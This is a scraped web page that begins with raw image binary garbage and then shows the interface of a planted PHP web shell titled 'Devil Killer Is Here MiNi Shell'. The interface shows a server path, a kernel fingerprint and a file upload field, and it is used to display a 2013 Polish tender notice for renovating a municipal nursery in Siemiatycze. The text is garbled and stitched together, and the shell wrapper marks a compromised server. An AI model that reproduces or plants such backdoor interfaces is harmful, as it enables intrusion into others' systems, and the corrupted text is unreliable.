JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130617/232154-N-2013.html

<p class="kh_header"><b>Siemiatycze: Remont budynku Żłobka Miejskiego w Siemiatyczach</b><br>
<b>Numer ogłoszenia: 232154 - 2013; data zamieszczenia: 17.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Żłobek Miejski w Siemiatyczach , Ul. 11 Listopada 24, 17-300 Siemiatycze, woj. podlaskie, tel. 85 655 21 57, faks 85 655 21 16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedszkole03.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: oświata.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku Żłobka Miejskiego w Siemiatyczach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont Żłobka Miejskiego w Siemiatyczach polegający na
Remont holu wejściowego do budynku, obejmujący:
wymianę 4 sztuk okien o wymiarach 100x170 cm, PVC w kolorze białym, uchylno-rozwieralnych, każde z nawietrzakami okiennymi typu Aereco. Stolarka okienna z profili z PVC, z szybami termoizolacyjnymi o współczynniku izolacyjności okna U poniżej 1,1 W m K. Klasyfikacja akustyczna okien - Rw 25-30 dB.
Okna należy wyposażyć w komplet uszczelek oraz pełen zakres akcesoriów takich jak klamki,
zamki, samozamykacze i in. w kolorze ram.
dla każdego okna wymianę parapetu zewnętrznego na nowy stalowy ocynkowany malowany
proszkowo w kolorze brązowym.
dla każdego okna wymianę parapetu wewnętrznego na nowy z konglomeratu marmurowego.
wymianę 5 sztuk grzejników na nowe aluminiowe KFA G 500 F do stosowania w budynkach
użyteczności publicznej, z atestem higienicznym.
wymianę 5 sztuk obudowy grzejników wg detalu,
wymianę istniejącej posadzki pvc na nową z płytek gresowych drewnopodobnych o wzorze jasnego drewna, o wymiarach 15 x 60 cm, antypoślizgowych R9, V-klasy ścieralności, z fugą epoksydową w kolorze płytek. Istniejące cokoliki drewniane zdemontować i wykonać nowe wys. 15cm, z płyt gresowych podłogowych, z ćwierćwałkiem pvc.
oczyszczenie, wyrównanie i malowanie sufitów i ścian na całą wysokość pomieszczenia 2-krotnie farbami dyspersyjnymi lateksowymi o gładkiej powierzchni i jednolitym kolorze, odpornymi na  zmywanie i szorowanie. W pasie do wysokości 1,6m wszystkie ściany nie zajęte pod wykładziny ścienne malować farbami o I lub II klasie odporności na szorowanie zgodnie z PN-EN 13300 lub PN 92 C-8151.
wymianę istniejącej kraty stalowej przy klatce schodowej na nową, z płaskowników stalowych w
ramie mocowanej do stropów śrubami M16 z maskownicami co 1m. Krata malowana proszkowo
wg detalu.
Remont sali dydaktycznej (1), obejmujący
dla każdego okna wymianę parapetu wewnętrznego na nowy z konglomeratu marmurowego.
wymianę 5 sztuk grzejników na nowe aluminiowe KFA G 350 F do stosowania w budynkach użyteczności publicznej, z atestem higienicznym.
wymianę 5 sztuk obudowy grzejników wg detalu,
wymianę istniejącej posadzki na nową z wykładziny akustycznej i elastycznej pvc, V-klasy ścieralności. Istniejące cokoliki drewniane zdemontować i wykonać nowe wyoblenie ścian i cokoliki z wykładziny podłogowej.
oczyszczenie, wyrównanie i malowanie sufitów i ścian na całą wysokość pomieszczenia 2-krotnie farbami dyspersyjnymi lateksowymi o gładkiej powierzchni i jednolitym kolorze, odpornymi na
zmywanie i szorowanie. W pasie do wysokości 1,6m wszystkie ściany nie zajęte pod wykładziny ścienne malować farbami o I lub II klasie odporności na szorowanie zgodnie z PN-EN 13300 lub PN 92 C-8151.
poszerzenie otworów w murze o ok. 10cm i wymiana 2 szt. drzwi wejściowych na nowe PVC o wymiarach 90x200 cm w świetle drzwi, oraz 1 szt. drzwi dwuskrzydłowych w okleinie
drewnopodobnej odpornej na szorowanie i urazy mechaniczne, z podcięciem wentylacyjnym w dolnej części drzwi, szklone szybą bezpieczną satynowaną. Wzór i kolor drzwi dostosować do drzwi w innych częściach budynku. Ościeżnica stalowa z maskownicą o wzorze drewna.
Remont sali dydaktycznej (2), obejmujący
dla każdego okna wymianę parapetu wewnętrznego na nowy z konglomeratu marmurowego.
wymianę 5 sztuk grzejników na nowe aluminiowe KFA G 350 F do stosowania w budynkach
użyteczności publicznej, z atestem higienicznym.
wymianę 5 sztuk obudowy grzejników wg detalu,
wymianę istniejącej posadzki na nową z wykładziny akustycznej i elastycznej pvc, V-klasy
ścieralności. Istniejące cokoliki drewniane zdemontować i wykonać
nowe wyoblenie ścian i cokoliki z wykładziny podłogowej.
oczyszczenie, wyrównanie i malowanie sufitów i ścian na całą wysokość pomieszczenia 2-krotnie
farbami dyspersyjnymi lateksowymi o gładkiej powierzchni i jednolitym kolorze, odpornymi na
zmywanie i szorowanie. W pasie do wysokości 1,6m wszystkie ściany nie zajęte pod wykładziny
ścienne malować farbami o I lub II klasie odporności na szorowanie zgodnie z PN-EN 13300 lub
PN 92 C-8151.
poszerzenie otworów w murze o ok. 10cm i wymiana 2 szt. drzwi wejściowych na nowe PVC o
wymiarach 90x200 cm w świetle drzwi, w okleinie drewnopodobnej odpornej na szorowanie i urazy
mechaniczne, z podcięciem wentylacyjnym w dolnej części drzwi, szklone szybą bezpieczną
satynowaną. Wzór i kolor drzwi dostosować do drzwi w innych częściach budynku. Ościeżnica
stalowa z maskownicą o wzorze drewna.
Remont szatni, obejmujący:
wyburzenie ścianki działowej pomiędzy istniejącymi szatniami i połączenie obu pomieszczeń.
Uzupełnienie tynków na ścianach i suficie w miejscu rozbiórki, uzupełnienie warstw posadzkowych.
wymianę 4 sztuk okien o wymiarach 100x170 cm, PVC w kolorze białym, uchylno-rozwieralnych,
każde z nawietrzakami okiennymi typu Aereco. Stolarka okienna z profili z PVC, z szybami
termoizolacyjnymi o współczynniku izolacyjności okna U poniżej 1,1 W/m K. Klasyfikacja akustyczna
okien - Rw 25-30 dB.
Okna należy wyposażyć w komplet uszczelek oraz pełen zakres akcesoriów takich jak klamki,
zamki, samozamykacze i in. w kolorze ram.
dla każdego okna wymianę parapetu wewnętrznego na nowy z konglomeratu marmurowego.
wymianę 4 sztuk grzejników na nowe aluminiowe KFA G 500 F do stosowania w budynkach
użyteczności publicznej, z atestem higienicznym.
wymianę 4 sztuk obudowy grzejników wg detalu,
wymianę istniejącej posadzki na nową z wykładziny pvc , V-klasy ścieralności, antypoślizgową R9.
Istniejące cokoliki drewniane zdemontować i wykonać nowe wyoblenie ścian i cokoliki z wykładziny podłogowej.
oczyszczenie, wyrównanie i malowanie sufitów i ścian na całą wysokość pomieszczenia 2-krotnie farbami dyspersyjnymi lateksowymi o gładkiej powierzchni i jednolitym kolorze, odpornymi na  zmywanie i szorowanie. W pasie do wysokości 1,6m wszystkie ściany nie zajęte pod wykładziny ścienne malować farbami o I lub II klasie odporności na szorowanie zgodnie z PN-EN 13300 lubPN 92 C-8151.
poszerzenie otworów w murze o ok. 10cm i wymiana 1 szt. drzwi wejściowych na nowe PVC o wymiarach 90x200 cm w świetle drzwi, w okleinie drewnopodobnej odpornej na szorowanie i urazy mechaniczne, z podcięciem wentylacyjnym w dolnej części drzwi, szklone szybą bezpieczną satynowaną. Wzór i kolor drzwi dostosować do drzwi w innych częściach budynku. Ościeżnica stalowa z maskownicą o wzorze drewna.
Remont korytarza, obejmujący
wymianę istniejącej posadzki na nową z wykładziny pvc, V-klasy ścieralności, antypoślizgową R9.Istniejące cokoliki drewniane zdemontować i wykonać nowe wyoblenie ścian i cokoliki z wykładzinypodłogowej.
oczyszczenie, wyrównanie i malowanie sufitów i ścian na całą wysokość pomieszczenia 2-krotnie farbami dyspersyjnymi lateksowymi o gładkiej powierzchni i jednolitym kolorze, odpornymi na zmywanie i szorowanie. W pasie do wysokości 1,6m wszystkie ściany nie zajęte pod wykładziny ścienne malować farbami o I lub II klasie odporności na szorowanie zgodnie z PN-EN 13300 lub PN 92 C-8151.
Remont łazienki, obejmujący:
wymianę 2 sztuk okien na nowe o wymiarach 100x170 cm, PVC w kolorze białym, uchylnorozwieralne, każde z nawietrzakami okiennymi typu Aereco. Stolarka okienna z profili z PVC, z
szybami termoizolacyjnymi o współczynniku izolacyjności okna U poniżej 1,1 W/m K. Klasyfikacja akustyczna okien - Rw 25-30 dB.
Okna należy wyposażyć w komplet uszczelek oraz pełen zakres akcesoriów takich jak klamki,zamki, samozamykacze i in. w kolorze ram. Szyba nieprzezierna.
dla każdego okna wymianę parapetu wewnętrznego na nowy z konglomeratu marmurowego.
wymianę 2 sztuk grzejników na nowe aluminiowe KFA G 500 F do stosowania w budynkach użyteczności publicznej, z atestem higienicznym.
wymianę 2 sztuk obudowy grzejników wg detalu, na nowe z płyty HPL odpornej na działanie wilgoci na konstrukcji z płaskowników ocynkowanych. Wszystkie elementy zawiesia niekorodujące.
poszerzenie otworu w murze i wymiana 1 szt. drzwi wejściowych na nowe PVC o wymiarach 90x200 cm w świetle drzwi, w okleinie drewnopodobnej odpornej na szorowanie i urazy mechaniczne, z otworami lub podcięciem wentylacyjnym o powierzchni 220 cm2 w dolnej części drzwi, szklone szybą bezpieczną satynowaną. Ościeżnica stalowa z maskownicą o wzorze drewna. Drzwi z możliwością otwierania do 180o z odbojnikiem ściennym. Uzupełnić płytki ceramiczne na ścianach łazienki po przekuciu otworu.
oczyszczenie, wyrównanie i malowanie sufitów i ścian w miejscach nie zajętych po okładziny ścienne 2-krotnie farbami dyspersyjnymi lateksowymi o gładkiej powierzchni i jednolitym kolorze, odpornymi na zmywanie i szorowanie oraz na działanie wilgoci.
zamurowanie otworu do pomieszczenia socjalnego oraz przełożenie brodzika prysznicowego na przeciwległą ścianę, wraz z wykonaniem izolacji podpłytkowej oraz uzupełnienie okładzin ściennych od strony łazienki i pomieszczenia socjalnego.
montaż 3 sztuk kabin sanitarnych systemowych typowych typu LTT 24 mm, z niską ościeżnicą h=1,3 m, z atestami do stosowania w budynkach przedszkolnych. Kabiny montować bez drzwi wejściowych. Kabiny wykonać z laminowanej płyty wiórowej odpornej na wilgoć P5, z prześwitem nad posadzką 15 cm. Od strony brodzika prysznicowego montować ścianę kabinową prysznicową odporną na działanie wody z dwustronnie dekorowanego laminatu HPL gr. 13 mm, o wysokiej odporności na wilgoć i uszkodzenia mechaniczne, wysokiej odporności chemicznej i biologicznej.
zamurowanie istniejącego otworu drzwiowego do pom. socjalnego, przełożenie brodzika prysznicowego na przeciwległą ścianę. W miejscu montażu brodzika skuć istniejące płytki i wykonać do wysokości 2,0m izolację przeciwwodną podpłytkową. Uzupełnić okładzinę ścienną z płytek ceramicznych.
Remont pomieszczenia socjalnego, obejmujący
wymianę 1 sztuki okna na nowe o wymiarach 100x170 cm, PVC w kolorze białym, uchylnorozwieralne,
z nawietrzakiem okiennym typu Aereco. Stolarka okienna z profili z PVC, z szybami
termoizolacyjnymi o współczynniku izolacyjności okna U poniżej 1,1 W/m K.Klasyfikacja akustyczna
okien - Rw 25-30 dB. Okno należy wyposażyć w komplet uszczelek oraz pełen zakres akcesoriów takich jak klamki, zamki, samozamykacze i in. w kolorze ram. Szyba nieprzezierna.
wymianę parapetu wewnętrznego na nowy z konglomeratu marmurowego.
wymianę 1 sztuki grzejnika na nowy aluminiowy KFA G 500 F do stosowania w budynkach
użyteczności publicznej, z atestem higienicznym.
wymianę 1 sztuki obudowy grzejnika wg detalu,
poszerzenie otworu w murze i wymiana 1 szt. drzwi wejściowych na nowe PVC o wymiarach 90x200 cm w świetle drzwi, w okleinie drewnopodobnej odpornej na szorowanie i urazy mechaniczne, z otworami lub podcięciem wentylacyjnym o powierzchni 220 cm2 w dolnej części drzwi, szklone szybą bezpieczną satynowaną. Wzór i kolor drzwi dostosować do drzwi w innych częściach budynku. Ościeżnica stalowa z maskownicą o wzorze drewna. Drzwi z możliwością otwierania do 180o z odbojnikiem ściennym.
oczyszczenie, wyrównanie i malowanie sufitów i ścian na całą wysokość pomieszczenia w miejscach nie zajętych po okładziny ścienne 2-krotnie farbami dyspersyjnymi lateksowymi o gładkiej powierzchni i jednolitym kolorze, odpornymi na zmywanie i szorowanie oraz na działanie wilgoci.
wykonanie fartucha (okładziny ściennej) z płytek ceramicznych drewnopodobnych wokół umywalki i zlewozmywaka do wys. 1,6 m i 60 cm poza zasięg docierania wody. Pod warstwą płytek wykonać izolację przeciwwilgociową podpłytkową.
wymianę istniejącej posadzki pvc na nową z płytek gresowych drewnopodobnych o wzorze jasnego drewna, o wymiarach 15 x 60 cm, antypoślizgowych R9, V-klasy ścieralności, z fugą epoksydową w kolorze płytek. Istniejące cokoliki drewniane zdemontować i wykonać nowe wys. 15 cm, z płyt gresowych podłogowych, z ćwierćwałkiem pvc.
Uwagi
Przed przystąpieniem do oczyszczania i malowania ścian, należy zdemontować wszystkie
elementy ruchome niebudowlane takie jak: tablice, odbojnice, obudowy ścian, karnisze, cokoliki
drewniane itp. Po oczyszczeniu i odrestaurowaniu elementy ruchome montować ponownie.
Dla wszystkich drzwi projektuje się odbojniki montowane na ścianie.
Przed ułożeniem wykładzin podłogowych należy wyrównać istniejące posadzki zaprawami
wyrównującymi na zagruntowanym podłożu z uwzględnieniem istniejących dylatacji oraz dylatacji obwodowej.
Wykładzina podłogowa PVC musi spełniać następujące parametry:
homogeniczna, jednorodna w strukturze i wzorze przez całą grubość,
odporność na ścieranie,
odporność ogniowa- B1 ,
fabrycznie wzmocniona i utwardzona poliuretanem- PUR,
właściwości antypoślizgowe - R9,
światłoodporność,
atest higieniczny, atest trudno zapalności,
certyfikat zgodności ITB z polską normą,
Kolorystykę ustalić z Inwestorem.
Płytki ceramiczne i gresowe podłogowe muszą spełniać następujące parametry:
grupa I- nasiąkliwość wodna- max. 3%
klasa ścieralności PEI - V,
twardość w skali Mohsa 4- 5,
odporne na środki dezynfekcyjne,
wytrzymałość na zginanie - min. 35MPa,
odporność na pęknięcia włoskowate,
współczynnik tarcia kinetycznego w stanie suchym- min. 0,24
skuteczność antypoślizgowa- R9 (płytki gładkie) R11 (reliefowe),
format, kolor płytek i spoin- do uzgodnienia z Inwestorem,
Kolorystykę przed wbudowaniem i malowaniem uzgodnić z Inwestorem.
Osłona grzejnikowa z ażurowych laminowanych płyt MDF z zaokrąglonymi narożami typu Rafalo MDF
seria C z otworami śr. 6 cm, montowane na podkonstrukcji systemowej.
Remont płyty tarasowej oraz schodów terenowych od strony południowej, wymiana balustrady
stalowej.
Istniejący taras oraz schody terenowe są w stanie zadowalającym, wymagającym wymiany wylewki
betonowych i remontu płyty balkonowej. Projektuje się całkowite usunięcie istniejących wylewek
betonowych na płycie balkonowej i schodach oraz remont podłoża betonowego tarasu przy
zastosowaniu wyrobów o parametrach technicznych zbliżonych do parametrów naprawianego
elementu w systemie renowacji betonów .
Następnie wykonać warstwę spadkową o nachyleniu 2-2,5 procent z szybko twardniejącej masy
posadzkowej typu, ułożonej na warstwie kontaktowej z tej samej masy z dodatkiem
emulsji typu. Szczeliny dylatacyjne należy wypełnić polipropylenowym sznurem
dylatacyjnym i uszczelnić wypełniaczami.
Obróbki blacharskie na otwartych krawędziach balkonu, mocować na warstwie jastrychu, śrubami
na plastikowych dyblach. W podłożu osadzić przy użyciu uszczelniacza poliuretanowego. Na krawędziach zamkniętych, w styku z elementami obudowy balkonu, warstwę
jastrychu oddylatować od elementów pionowych. Na wierzchniej warstwie obróbki blacharskiej
należy nałożyć jako warstwę szczepną żywicę epoksydową, na której należy wykonać posypkę z
piasku kwarcowego.
Na powierzchni jastrychu wykonać izolację przeciwwodną w systemie typu. W linii
przebiegu szczelin dylatacyjnych, jak również na styku jastrychu ze ścianą budynku, w warstwę
izolacji należy wkleić taśmę uszczelniającą. Wykonać cokolik wzdłuż całej
długości płyty tarasowej i schodów z izolacji oraz płytek posadzkowych na wys. min. 10 cm.
Posadzkę na balkonie układać z mrozoodpornych i antypoślizgowych płytek gresowych na
elastycznej zaprawie klejącej. Płytki gresowe dobrać w kolorze i o wzorze
drewna ( zbliżonych do posadzek w budynku). Biegi schodów wykonać z płytek gresowych
stopnicowych antypoślizgowych ryflowanych o wzorze drewna i o kolorze widocznie ciemniejszym
od płytek tarasu.
Płytki na spoinować za pomocą elastycznej, wodoodpornej fugi .
Zaprawa do spoinowania w miejscach połączeń na styku jastrychu ze ścianą budynku powinna być
zastąpiona wypełnieniem z poliuretanu, ewentualnie silikonem. Dodatkowo,
elastyczna spoina z silikonu powinna się pojawić w styku wykładziny ceramicznej z cokolikiem
wokół balkonu, jak również w obrębie mocowań barierki.
Istniejącą balustradę stalową należy zdemontować. W jej miejsce projektuje się nową balustradę
ze stali ocynkowanej malowanej proszkowo. Balustradę mocować do płyty balkonowej za pomocą
4 śrub M 16 z maskownicami.
Projektuje się obróbki blacharskie z blachy stalowej ocynkowanej gr. min. 0,7 mm.
Na spodniej powierzchni stropu tarasu skuć istniejące tynki, oczyścić i wykonać nowe tynki
cementowo-wapienne z wklejoną siatką pvc. Spód i boki płyty tarasowej malować farbami
silikonowymi w kolorze białym.
Uwagi końcowe.
przed przystąpieniem do realizacji obiektu budowlanego należy dokładnie zapoznać się z
projektem i wszystkie zastrzeżenia lub wątpliwości należy zgłosić przed przystąpieniem do prac
budowlanych.
wszystkie roboty budowlane wykonywać zgodnie z przepisami prawa budowlanego, warunkami
technicznymi wykonania robót i zasadami sztuki budowlanej
wszystkie materiały użyte w budynku muszą posiadać aktualne atesty polskie i świadectwa
dopuszczania do stosowania w budownictwie,
wszystkie zmiany i odstępstwa od projektu budowlanego wymagają każdorazowo uzgodnienia z
projektantem,
projekt podlega ochronie prawnej w oparciu o ustawę o prawie autorskim i prawach pokrewnych,
Wszystkie materiały i urządzenia budowlane wyszczególnione w niniejszym projekcie zostały
przyjęte do obliczeń i mogą być zastąpione innymi, lecz nie o gorszych parametrach technicznych.

Zamawiający dopuszcza możliwość stosowania materiałów równoważnych w sytuacji, gdy 
Zamawiający w przedmiocie zamówienia wskazał znaki towarowe, patenty lub pochodzenie,
Zamawiający opisał przedmiot zamówienia za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia.

Szczegółowy opis przedmiotu zamówienia stanowią załączniki: 
Załącznik Nr 1 do SIWZ	Specyfikacja techniczna wykonania i odbioru robót budowlanych
Załącznik Nr 2 do SIWZ	Dokumentacja projektowa
Załącznik Nr 3 do SIWZ	Przedmiar robót


Wymagany okres gwarancji dla przedmiotu zamówienia tj. na wykonane roboty (materiały i robociznę) wynosi 36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-7, 45.41.10.00-0, 45.42.10.00-4, 45.43.21.11-5, 45.43.00.00-0, 43.54.42.10-8, 45.26.25.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 3.000 zł (słownie: trzy tysiące złotych).
2.	Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy Pzp, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275 ze zm.).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
Bank Polska Kasa Opieki SA      Nr  75 1240 5266 6666 0010 4345 9769 
5.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego  pok. dyrektora , a kserokopię dokumentu poświadczoną za zgodność z oryginałem należy załączyć do oferty.
7.	Niewniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej dwie roboty budowlane polegające na budowie budynków lub remoncie budynków o wartości co najmniej 250. 000 zł brutto (słownie: dwieście pięćdziesiąt tysięcy złotych brutto) w przypadku każdej z tych robót.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnymi za kierowanie robotami budowlanymi, w tym co najmniej:
a) osobą posiadającą uprawnienia do kierowania robotami budowlanymi o specjalności konstrukcyjno- budowlanej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 250. 000 zł (słownie: dwieście pięćdziesiąt tysięcy złotych).</p>
</li></ul></li></ul>
